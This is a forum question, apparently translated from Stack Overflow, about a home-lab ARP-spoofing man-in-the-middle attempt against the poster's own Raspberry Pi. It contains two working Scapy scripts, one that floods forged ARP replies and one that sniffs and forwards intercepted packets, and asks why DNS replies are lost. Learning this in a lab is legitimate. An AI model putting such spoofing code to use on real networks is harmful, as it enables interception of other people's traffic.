Я хотел бы попробовать атаку «человек посередине» с помощью arp-спуфинга.
У меня есть мой компьютер, жертва (мой Raspberry Pi) и стандартный шлюз.
Для подмены я использую фрагмент кода из книга
Код: Выделить всё
#!/usr/bin/python
import sys
import time
from scapy.all import sniff, sendp, ARP, Ether
if len(sys.argv) < 3:
print sys.argv[0] + " "
sys.exit(0)
iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]
ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp
while True:
sendp(packet, iface=iface)
time.sleep(10)
Жертва отправляет пакеты с правильным IP-адресом, но с моим Mac-адресом.
Теперь жертва должна открыть веб-сайт (wget http//example.com), и я хочу использовать Wireshark для чтения трафика. Но мне нужно перенаправить пакеты (DNS и TCP/HTTP). Я попробовал это с помощью этого кода:
Код: Выделить всё
#!/etc/usr/python
from scapy.all import *
import sys
iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"
def handle_packet(packet):
if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
packet[Ether].dst = GATEWAY_MAC
sendp(packet)
print "A packet from " + packet[IP].src + " redirected!"
sniff(prn=handle_packet, filter=filter, iface=iface, store=0)
Шлюз представляет собой DSL-маршрутизатор, а значит, и «DNS-сервер».
Но мой Raspberry не получает ответ DNS. В чем моя вина?
С уважением,
MatStorm
Подробнее здесь: https://stackoverflow.com/questions/219 ... g-packages
Мобильная версия